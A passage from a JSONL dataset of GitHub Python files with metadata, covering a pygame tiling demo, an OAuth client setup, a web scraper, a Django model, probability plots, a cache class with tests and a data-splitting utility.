image.get_height() / 4.5), 2)\n\n pg.draw.circle(image, \"purple\" if flip else \"grey\",\n (image.get_width() / 2, image.get_height() / 2), SIZE/10)\n image = pg.transform.rotate(image, rotation)\n image = pg.transform.flip(image, flip, False)\n\n self.rot = rotation\n self.flipped = flip\n self.image = image\n\n def rotate_left(self):\n rot = - ROTATE_ANGLE if self.flipped else ROTATE_ANGLE\n self.rot = (self.rot + rot) % 360\n self.update_surface(self.rot, self.flipped)\n\n def rotate_right(self):\n rot = ROTATE_ANGLE if self.flipped else -ROTATE_ANGLE\n self.rot = (self.rot + rot) % 360\n self.update_surface(self.rot, self.flipped)\n\n def flip(self):\n self.flipped = not self.flipped\n self.update_surface(self.rot, self.flipped)\n\n def draw_hat(x, y):\n\n half = SIZE / 2\n apotheme = SIZE * sqrt(3) / 2\n\n # starting point\n start_x = x\n start_y = y\n\n point1 = (start_x, start_y),\n point2 = (start_x + (half * sin(pi / 6)),\n start_y - (half * cos(pi / 6)))\n point3 = (point2[0] + SIZE, point2[1] + 0)\n point4 = (point3[0] + half * cos(pi / 3),\n point3[1] + half * sin(pi / 3))\n point5 = (point4[0] - apotheme * cos(pi / 6),\n point4[1] + apotheme * sin(pi / 6))\n point6 = (point5[0],\n point5[1] + apotheme)\n point7 = (point6[0] - half,\n point6[1])\n point8 = (point7[0] - half * cos(pi / 3),\n point7[1] + half * sin(pi / 3))\n point9 = (point8[0] - apotheme * cos(pi / 6),\n point8[1] - apotheme * sin(pi / 6))\n point10 = (point9[0],\n point9[1] - apotheme)\n point11 = (point10[0] - half,\n point10[1])\n point12 = (point11[0] - half * cos(pi / 3),\n point11[1] - half * sin(pi / 3))\n point13 = (point12[0] + apotheme * cos(pi / 6),\n point12[1] - apotheme * sin(pi / 6))\n # print(\"size\", size)\n # print(point4[0]-point12[0])\n # print(point8[1]-point13[1])\n return [point1, point2, point3, point4,\n point5, point6, point7, point8, point9, point10, point11, point12, point13]\n\n\nif __name__ == \"__main__\":\n app = App()\n app.run()\n", "repo_name": "GuillaumeGSO/EinStein-Aperiodic-MonoTile", "sub_path": "pick_blocks.py", "file_name": "pick_blocks.py", "file_ext": "py", "file_size_in_byte": 7529, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pygame.init", "line_number": 18, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 23, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 23, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 27, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 27, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 36, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 36, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 39, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 39, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 40, "usage_type": "attribute"}, {"api_name": "pygame.KEYDOWN", "line_number": 40, "usage_type": "attribute"}, {"api_name": "pygame.K_ESCAPE", "line_number": 40, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 41, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 42, "usage_type": "call"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 44, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 45, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 45, "usage_type": "attribute"}, {"api_name": "pygame.KEYDOWN", "line_number": 47, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 48, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 50, "usage_type": "attribute"}, {"api_name": "pygame.K_SPACE", "line_number": 52, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 66, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 66, "usage_type": "attribute"}, {"api_name": "pygame.sprite.GroupSingle", "line_number": 67, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 67, "usage_type": "attribute"}, {"api_name": "pygame.sprite.spritecollide", "line_number": 82, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 82, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 83, "usage_type": "attribute"}, {"api_name": "pygame.color.Color", "line_number": 94, "usage_type": "call"}, {"api_name": "pygame.color", "line_number": 94, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 130, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 130, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 140, "usage_type": "attribute"}, {"api_name": "pygame.mask.from_surface", "line_number": 154, "usage_type": "call"}, {"api_name": "pygame.mask", "line_number": 154, "usage_type": "attribute"}, {"api_name": "pygame.transform.rotate", "line_number": 159, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 159, "usage_type": "attribute"}, {"api_name": "pygame.transform.flip", "line_number": 160, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 160, "usage_type": "attribute"}, {"api_name": "pygame.Surface", "line_number": 165, "usage_type": "call"}, {"api_name": "pygame.SRCALPHA", "line_number": 165, "usage_type": "attribute"}, {"api_name": "pygame.draw.polygon", "line_number": 168, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 168, "usage_type": "attribute"}, {"api_name": "pygame.draw.lines", "line_number": 171, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 171, "usage_type": "attribute"}, {"api_name": "pygame.draw.circle", "line_number": 174, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 174, "usage_type": "attribute"}, {"api_name": "pygame.transform.rotate", "line_number": 176, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 176, "usage_type": "attribute"}, {"api_name": "pygame.transform.flip", "line_number": 177, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 177, "usage_type": "attribute"}, {"api_name": "math.sqrt", "line_number": 200, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 207, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 207, "usage_type": "name"}, {"api_name": "math.cos", "line_number": 208, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 208, "usage_type": "name"}, {"api_name": "math.cos", "line_number": 210, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 210, "usage_type": "name"}, {"api_name": "math.sin", "line_number": 211, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 211, "usage_type": "name"}, {"api_name": "math.cos", "line_number": 212, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 212, "usage_type": "name"}, {"api_name": "math.sin", "line_number": 213, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 213, "usage_type": "name"}, {"api_name": "math.cos", "line_number": 218, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 218, "usage_type": "name"}, {"api_name": "math.sin", "line_number": 219, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 219, "usage_type": "name"}, {"api_name": "math.cos", "line_number": 220, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 220, "usage_type": "name"}, {"api_name": "math.sin", "line_number": 221, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 221, "usage_type": "name"}, {"api_name": "math.cos", "line_number": 226, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 226, "usage_type": "name"}, {"api_name": "math.sin", "line_number": 227, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 227, "usage_type": "name"}, {"api_name": "math.cos", "line_number": 228, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 228, "usage_type": "name"}, {"api_name": "math.sin", "line_number": 229, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 229, "usage_type": "name"}]} +{"seq_id": "10217425896", "text": "import numpy as np\nimport json\nfrom os.path import exists\n\ndef parseColor(vari):\n\tstops = [ np.percentile(vari, x) for x in [20, 40, 60, 80]]\n\tpalette = np.repeat( [0, 63, 127, 191, 255], 3)\n\treturn {'stops': stops, 'palette': palette.tolist()}\n\t\ndef printJson(vari, ofn):\n\tif exists(ofn):\n\t\treturn print(\"%s file exist\"%ofn)\n\n\tobj = parseColor(vari)\n\twith open( ofn, 'x') as f:\n\t\ttxt = json.dumps(obj)\n\t\tf.write(txt)\n\nif __name__ == '__main__':\n\tifn = 'file.nc'\n\titems = ['var1', 'var2']\n\n\tfrom scipy.io.netcdf import netcdf_file\n\twith netcdf_file( ifn, 'r') as f:\n\t\tfor itm in items:\n\t\t\tdata = f.variables[itm]\n\t\t\tprintJson(data[:], '_'+itm+'.json')\n", "repo_name": "hsinewu/earth", "sub_path": "scripts/make_json.py", "file_name": "make_json.py", "file_ext": "py", "file_size_in_byte": 652, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.percentile", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.repeat", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 11, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 16, "usage_type": "call"}, {"api_name": "scipy.io.netcdf.netcdf_file", "line_number": 24, "usage_type": "call"}]} +{"seq_id": "3650108388", "text": "from authlib.integrations.django_client import OAuth\nfrom SJTUPlus.settings import JACCOUNT_CLIENT_ID, JACCOUNT_CLIENT_SECRET\n\n# documentation: https://docs.authlib.org/en/latest/client/django.html\n\noauth = OAuth()\noauth.register(\n name='jaccount',\n client_id=JACCOUNT_CLIENT_ID,\n client_secret=JACCOUNT_CLIENT_SECRET,\n access_token_url='https://jaccount.sjtu.edu.cn/oauth2/token',\n authorize_url='https://jaccount.sjtu.edu.cn/oauth2/authorize',\n api_base_url='https://api.sjtu.edu.cn/',\n client_kwargs={\n \"scope\": \"openid\",\n \"token_endpoint_auth_method\": \"client_secret_basic\",\n \"token_placement\": \"header\"\n }\n)\njaccount = oauth.jaccount\n", "repo_name": "SJTU-Plus/sjtu-plus", "sub_path": "SJTUPlus/oauth.py", "file_name": "oauth.py", "file_ext": "py", "file_size_in_byte": 684, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 75, "dataset": "github-code", "pt": "61", "api": [{"api_name": "authlib.integrations.django_client.OAuth", "line_number": 6, "usage_type": "call"}, {"api_name": "SJTUPlus.settings.JACCOUNT_CLIENT_ID", "line_number": 9, "usage_type": "name"}, {"api_name": "SJTUPlus.settings.JACCOUNT_CLIENT_SECRET", "line_number": 10, "usage_type": "name"}]} +{"seq_id": "12951060394", "text": "from bs4 import BeautifulSoup\nimport requests\nimport pandas as pd\n\ndef scrape(url, lang):\n\tprint(\"Scraping url: {}\".format(url))\n\ttech = []\n\tlanguage = []\n\n\tr = requests.get(url)\n\tsoup = BeautifulSoup(r.text, 'html.parser')\n\t\n\tfor h4 in soup.findAll('h4', class_=\"course-block__title\"):\n\t\ttech.append(h4.text.strip())\n\t\tlanguage.append(lang)\n\n\n\treturn tech, language\n\ndef concat_lists(l1, l2):\n\treturn l1 + l2\n\t\ndef make_df(list1, list2, name1, name2):\n\tprint(\"creating the dataframe, names for columns: {}, {}\".format(name1, name2))\n\td = {name1:list1, name2:list2}\n\n\tdf = pd.DataFrame.from_dict(d, orient='index')\n\n\treturn df\n\n\nurl_1 = \"https://www.datacamp.com/courses/tech:r\"\nurl_2 = \"https://www.datacamp.com/courses/tech:python\"\n\nr_list, r_language = scrape(url_1, \"R\")\np_list, p_language = scrape(url_2, \"Python\")\n\ntech = concat_lists(r_list, p_list)\nlanguage = concat_lists(r_language, p_language)\n\ndf_coursenames = make_df(tech, language, \"Tech\", \"Language\")\ndf_coursenames = df_coursenames.transpose()\n\nprint(\"Data Frame Created looks like this:\")\nprint(df_coursenames)", "repo_name": "christeropda/BED-2056-assignments3-5", "sub_path": "assignment3-5/assignment3.py", "file_name": "assignment3.py", "file_ext": "py", "file_size_in_byte": 1078, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "requests.get", "line_number": 10, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 11, "usage_type": "call"}, {"api_name": "pandas.DataFrame.from_dict", "line_number": 27, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 27, "usage_type": "attribute"}]} +{"seq_id": "23188630045", "text": "#Modelo Profesion\nfrom django.db import models\nfrom django.contrib.auth.models import User\n\nclass Profesion(models.Model):\n \n descripcion = models.CharField(\n unique=True,\n max_length=50,\n error_messages={\n 'unique': 'Profesion ya existe'\n }\n )\n activo = models.BooleanField(default=True)\n creado = models.DateTimeField(auto_now_add=True)\n modificado = models.DateTimeField(auto_now=True)\n\n usuario = models.ForeignKey(\n User, \n related_name='usuarioProfesion',\n on_delete=models.PROTECT\n )\n\n def __str__(self):\n return self.descripcion\n\n\n def delete(self, *args):\n self.activo = False\n self.save()\n return True", "repo_name": "raulIxc85/Proyecto-Aula-Virtual", "sub_path": "api/models/profesion.py", "file_name": "profesion.py", "file_ext": "py", "file_size_in_byte": 729, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.db.models.Model", "line_number": 5, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 5, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 7, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.models.BooleanField", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 15, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 15, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 16, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 16, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 18, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User", "line_number": 19, "usage_type": "argument"}, {"api_name": "django.db.models", "line_number": 18, "usage_type": "name"}, {"api_name": "django.db.models.PROTECT", "line_number": 21, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 21, "usage_type": "name"}]} +{"seq_id": "21913147847", "text": "# Importing required libraries\n'''\nA probability distribution is a statistical function that describes the likelihood of obtaining the possible values that \na random variable can take. By this, we mean the range of values that a parameter can take when we randomly pick up values \nfrom it.\n\nA Normal Distribution is also known as a Gaussian distribution or famously Bell Curve. \nPeople use both words interchangeably, but it means the same thing. It is a continuous probability distribution.\n\nThe probability density function (pdf) for Normal Distribution:\n\n'''\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sb\nfrom scipy.stats import binom\nfrom numpy import random\n\n###UniModal Density Function\n \n# Creating a series of data of in range of 1-50.\nx = np.linspace(1,50,200)\n\n#print(x)\n \n#Creating a Function.\ndef normal_dist(x , mean , sd):\n #prob_density = (np.pi*sd) * np.exp(-0.5*((x-mean)/sd)**2)\n prob_density = (1/((2*np.pi)**0.5 *sd)) * np.exp(-0.5*((x-mean)/sd)**2)\n return prob_density\n \n#Calculate mean and Standard deviation.\nmean = np.mean(x)\nsd = np.std(x)\n \n#Apply function to the data.\npdf = normal_dist(x,mean,sd)\n \n#Plotting the Results\nplt.plot(x,pdf , color = 'red')\nplt.xlabel('Data points')\nplt.ylabel('Probability Density')\nplt.show()\n\n###Multimodal Density Function\n#here we are using multinomial function to generate distributions of size 1000 with 3 outcomes each having probability 1/3\nsb.distplot(random.multinomial(size=1000,n=3,pvals=[1/3,1/3,1/3]), hist=True, label='normal')\n#plotting the graph\nplt.show()\n\n###To generate a random sample with a sample size of 200, which follows a normal distribution \n###with a mean of 100 and a standard deviation of 20\nSampleSize = 200\nmean = 100\nsd = 20\nRandomSample = np.random.normal(mean, sd, SampleSize)\nprint(\"Random Sample: {}\".format(RandomSample))\n\n#The distribution of diastolic blood pressure for men is normally distributed with a mean of about 80 and \n#a standard deviation of 20.\nSampleSize = 200\nmean = 80\nsd = 20\nRandomSample = np.random.normal(mean, sd, SampleSize)\nprint(\"Random Sample: {}\".format(RandomSample))\nplt.hist(RandomSample)\nplt.show()\n\n\n\n'''\n###Multimodal Density Function\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.stats import binom\n \n# Creating a series of data of in range of 1-50.\nx = np.linspace(1,50,50)\nx1 = np.linspace(20,80,60)\nx2 = np.linspace(10,100,90)\n\nX = np.concatenate([x, x1, x2])\n\nprint(x)\nprint(x1)\nprint(x2)\nprint(X)\n \n#Creating a Function.\ndef normal_dist(X , mean , sd):\n prob_density = (np.pi*sd) * np.exp(-0.5*((X-mean)/sd)**2)\n #prob_density = (1/((2*np.pi)**0.5 *sd)) * np.exp(-0.5*((x-mean)/sd)**2)\n return prob_density\n \n#Calculate mean and Standard deviation.\nmean = np.mean(X)\nsd = np.std(X)\n \n#Apply function to the data.\npdf = normal_dist(X,mean,sd)\n \n#Plotting the Results\nplt.plot(X, pdf , color = 'red')\nplt.xlabel('Data points')\nplt.ylabel('Probability Density')\nplt.show()\n\n\nN=400\nmu, sigma = 100, 5\nmu2, sigma2 = 10, 40\nX1 = np.random.normal(mu, sigma, N)\nX2 = np.random.normal(mu2, sigma2, N)\nX = np.concatenate([X1, X2])\ncount, bins, ignored = plt.hist(X)\nplt.plot(bins,X)\nplt.show()\n\n'''\n\n'''\nimport matplotlib.pyplot as plt\nfrom scipy.stats import binom\n# setting the values\n# of n and p\nn = 100\np = 0.6\n# defining list of r values\nr_values = list(range(n + 1))\n# list of pmf values\ndist = [binom.pmf(r, n, p) for r in r_values ]\n# plotting the graph\nplt.bar(r_values, dist)\nplt.plot(r_values, dist)\nplt.show()\n'''\n\n\n'''\n###\n \n# Creating a series of data of in range of 1-50.\n#x = np.linspace(1,50,200)\n\n# Creating a series of data of in range of 100.\nmean, sd = 100, 20\nx = np.random.normal(mean, sd, 200)\n\nprint(x)\n \n#Creating a Function.\ndef normal_dist(bins , mean , sd):\n #prob_density = (np.pi*sd) * np.exp(-0.5*((x-mean)/sd)**2)\n prob_density = 1/(sd * np.sqrt(2 * np.pi)) * np.exp( - (bins - mean)**2 / (2 * sd**2) )\n return prob_density\n \n#Calculate mean and Standard deviation.\n#mean = np.mean(x)\n#sd = np.std(x)\n \n#Apply function to the data.\n#pdf = normal_dist(x,mean,sd)\n#pdf = normal_dist(x,mean,50)\n \n#Plotting the Results\n#plt.plot(x,pdf , color = 'red')\n#plt.xlabel('Data points')\n#plt.ylabel('Probability Density')\n#plt.show()\n\n#Plotting the Results\ncount, bins, ignored = plt.hist(x, 30, density=True)\n#print(bins)\n#plt.plot(bins, normal_dist(bin , mean , sd), linewidth=2, color='r')\nplt.plot(bins, 1/(sd * np.sqrt(2 * np.pi)) * np.exp( - (bins - mean)**2 / (2 * sd**2) ) ,linewidth=2, color='r')\nplt.show()\n'''", "repo_name": "Ayad-Mihidabi-Khan-Jitu/Workspace-Learning", "sub_path": "LAB_CSE/LAB_SimulationAndModeling/Unimodal_Multimodal_Normal_D.py", "file_name": "Unimodal_Multimodal_Normal_D.py", "file_ext": "py", "file_size_in_byte": 4540, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.linspace", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 30, "usage_type": "attribute"}, {"api_name": "numpy.exp", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "seaborn.distplot", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.random.multinomial", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "numpy.random.normal", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 57, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 65, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 67, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 67, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}]} +{"seq_id": "30927321575", "text": "'''\nThe Cache class caches data, with a delegate to get missing data\n'''\n\nfrom fileinput import filename\nimport json\n\nclass Cache:\n\tdef __init__(self, getAction):\n\t\tself.getAction = getAction\n\t\tself.data = {}\n\t\n\tdef __getitem__(self, key):\n\t\tif key not in self.data:\n\t\t\tvalue = self.getAction(key)\n\t\t\tself.data[key] = value\n\t\t\treturn value\n\t\treturn self.data[key]\n\t\n\tdef __setitem__(self, key, newvalue):\n\t\tself.data[key] = newvalue\n\t\n\tdef has(self, key):\n\t\treturn key in self.data\n\t\n\tdef __contains__(self, key):\n\t\treturn key in self.data\n\n\nclass JsonCache(Cache):\n\tdef __init__(self, getAction, filename):\n\t\tsuper().__init__(getAction)\n\t\tself.filename = filename\n\t\n\tdef __getitem__(self, key):\n\t\tif not isinstance(key, str):\n\t\t\traise RuntimeError('Keys need to be strings!')\n\t\treturn super().__getitem__(key)\n\t\n\tdef __setitem__(self, key, newvalue):\n\t\tif not isinstance(key, str):\n\t\t\traise RuntimeError('Keys need to be strings!')\n\t\treturn super().__setitem__(key, newvalue)\n\t\n\tdef load(self):\n\t\twith open(self.filename, 'r') as json_file:\n\t\t\tself.data = json.load(json_file)\n\t\n\tdef save(self):\n\t\twith open(self.filename, 'w') as json_file:\n\t\t\tjson.dump(self.data, json_file)\n\n#------------------------------------------------------------------------------------------\n\nimport unittest, pathlib, os\n\nclass CacheTests(unittest.TestCase):\n\tGetCallCount = 0\n\tGetDelegateReturn = '123'\n\n\t@staticmethod\n\tdef GetDelegate(key):\n\t\tCacheTests.GetCallCount += 1\n\t\treturn CacheTests.GetDelegateReturn\n\t\n\tdef setUp(self):\n\t\tCacheTests.GetCallCount = 0\n\n\tdef test_get_once_action_called(self):\n\t\tcache = Cache(CacheTests.GetDelegate)\n\t\tresult = cache[123]\n\t\tself.assertEqual('123', result)\n\t\tself.assertEqual(1, CacheTests.GetCallCount)\n\n\tdef test_get_multiple_action_called(self):\n\t\tcache = Cache(CacheTests.GetDelegate)\n\t\tresult = [ cache[123] for _ in range(10) ]\n\t\tself.assertTrue(all(x == '123' for x in result))\n\t\tself.assertEqual(1, CacheTests.GetCallCount)\n\n\tdef test_set_multiple_action_not_called(self):\n\t\tcache = Cache(CacheTests.GetDelegate)\n\t\tfor i in range(10):\n\t\t\tcache[i] = i\n\t\tself.assertEqual(0, CacheTests.GetCallCount)\n\t\tself.assertTrue(all([cache[i] == i for i in range(10)]))\n\t\tself.assertEqual(0, CacheTests.GetCallCount)\n\t\n\tdef test_has_check(self):\n\t\tcache = Cache(CacheTests.GetDelegate)\n\t\tcache[123] = '123'\n\t\tself.assertTrue(cache.has(123))\n\t\tself.assertTrue(123 in cache)\n\t\tself.assertFalse(cache.has('abc'))\n\t\tself.assertFalse('abc' in cache)\n\n\nclass JsonCacheTests(CacheTests):\n\tJsonFilename = os.path.join(pathlib.Path(__file__).parent.resolve(), 'test_output.json')\n\n\tdef test_save_load(self):\n\t\tjsoncache1 = JsonCache(CacheTests.GetDelegate, self.JsonFilename)\n\t\tjsoncache1['123'] = '123'\n\t\tjsoncache1['abc'] = 'abc'\n\t\tjsoncache1.save()\n\n\t\tjsoncache2 = JsonCache(CacheTests.GetDelegate, self.JsonFilename)\n\t\tjsoncache2.load()\n\t\tself.assertTrue('123' in jsoncache2)\n\t\tself.assertEqual('123', jsoncache2['123'])\n\t\tself.assertTrue('abc' in jsoncache2)\n\t\tself.assertEqual('abc', jsoncache2['abc'])\n\t\n\tdef test_get_set_nonstring(self):\n\t\tjsoncache = JsonCache(CacheTests.GetDelegate, self.JsonFilename)\n\t\twith self.assertRaises(RuntimeError):\n\t\t\tjsoncache[123] = 123\n\t\t\n\t\twith self.assertRaises(RuntimeError):\n\t\t\tjsoncache[1.1] = 123\n\n\n\n\nif __name__ == \"__main__\":\n\tunittest.main()\n", "repo_name": "tpendse/PythonSandbox", "sub_path": "cache.py", "file_name": "cache.py", "file_ext": "py", "file_size_in_byte": 3300, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "fileinput.filename", "line_number": 33, "usage_type": "name"}, {"api_name": "json.load", "line_number": 47, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 51, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 57, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 99, "usage_type": "call"}, {"api_name": "os.path", "line_number": 99, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 99, "usage_type": "call"}, {"api_name": "unittest.main", "line_number": 126, "usage_type": "call"}]} +{"seq_id": "31164765254", "text": "import contextlib\nimport logging\n\n\nclass MySQLSession(object):\n\n def __init__(self, conn):\n self._conn = conn\n self._cursor = conn.cursor(dictionary=True)\n self._log = logging.getLogger(__name__)\n\n def execute(self, statement, values):\n self._log.debug(\"Execute statement %s with values %s\",\n statement, values)\n self._cursor.execute(statement, values)\n return self._cursor\n\n def rollback(self):\n self._conn.rollback()\n\n def commit(self):\n self._conn.commit()\n\n def close(self):\n self._conn.close()\n\n\n@contextlib.contextmanager\ndef session_manager(engine, session=None):\n if session is None:\n session = engine.get_session()\n try:\n yield session\n session.commit()\n except Exception:\n session.rollback()\n raise\n finally:\n session.close()\n else:\n yield session\n", "repo_name": "phantomii/restalchemy", "sub_path": "restalchemy/storage/sql/sessions.py", "file_name": "sessions.py", "file_ext": "py", "file_size_in_byte": 955, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.getLogger", "line_number": 10, "usage_type": "call"}, {"api_name": "contextlib.contextmanager", "line_number": 28, "usage_type": "attribute"}]} +{"seq_id": "30689210977", "text": "from datetime import date\nfrom enum import Enum\n\n\nclass DayStatus(Enum):\n BAD = -1\n NORMAL = 0\n GOOD = 1\n\n def __str__(self):\n if self.value == -1:\n return \"Плохо\"\n elif self.value == 0:\n return \"Нормально\"\n elif self.value == 1:\n return \"Хорошо\"\n\n\nclass Day:\n def __init__(self, day_date: date = None, day_status: DayStatus = None):\n self.date = day_date\n self.status = day_status\n\n def __eq__(self, other):\n if isinstance(other, Day):\n return self.date == other.date and self.status == other.status\n return False\n\n def __ne__(self, other):\n return not self.__eq__(other)\n", "repo_name": "Tananndart/BeholderBot", "sub_path": "domain/day.py", "file_name": "day.py", "file_ext": "py", "file_size_in_byte": 714, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "enum.Enum", "line_number": 5, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 20, "usage_type": "name"}]} +{"seq_id": "10410809939", "text": "import shutil\nfrom pathlib import Path\nimport numpy as np\nimport pandas as pd\n\ndef create_split(data_dir, train_prop=0.8, val_prop=0, by_subject=False):\n \"\"\"Split the Dataset directory into training, validation and testing sets\n\n :param data_dir: the directory of the Dataset\n :type data_dir: str or pathlike\n :param train_prop: the proportion of data to go in the training set, defaults to 0.8\n :type train_prop: float, optional\n :param val_prop: the proportion of data to go in the validation set, defaults to 0\n :type val_prop: float, optional\n :param by_subject: whether to create splits by subject or by trials, defaults to False\n :type by_subject: bool, optional\n \"\"\"\n assert (train_prop + val_prop) > 0 and (train_prop + val_prop) < 1, \"Sum of training and validation proportion must be greater than zero and less than one\"\n\n data_path = Path(data_dir)\n\n # shuffle all samples\n annotations_df = pd.read_csv(data_path / 'annotations.csv')\n shuffled_df = annotations_df.sample(frac=1)\n\n # randomly split samples into sets\n if not by_subject:\n # using length of dataframe, split by training/val/test proportions\n df_len = len(shuffled_df)\n train_i, val_i, test_i = int(train_prop*df_len), int((train_prop+val_prop)*df_len), df_len\n\n # generate group labels\n group_labels = np.concatenate((np.repeat('train', train_i), np.repeat('val', (val_i - train_i)), np.repeat('test', (test_i - val_i))))\n\n # otherwise, randomly split subjects into sets\n else:\n # get an array with unique subject IDs\n ids = shuffled_df['subject_id'].unique()\n\n # using length of subject ID array, split by training/val/test proportions\n ids_len = len(ids)\n train_i, val_i, test_i = int(train_prop*ids_len), int((train_prop+val_prop)*ids_len), ids_len\n\n # get subject labels and dict from ID to group\n subject_labels = np.concatenate((np.repeat('train', train_i), np.repeat('val', (val_i - train_i)), np.repeat('test', (test_i - val_i))))\n id_to_group = {ids[i]: subject_labels[i] for i in range(ids_len)}\n\n # generate group labels\n group_labels = shuffled_df['subject_id'].apply(lambda subject: id_to_group[subject])\n\n # add group labels to annotations file and save\n shuffled_df['group'] = 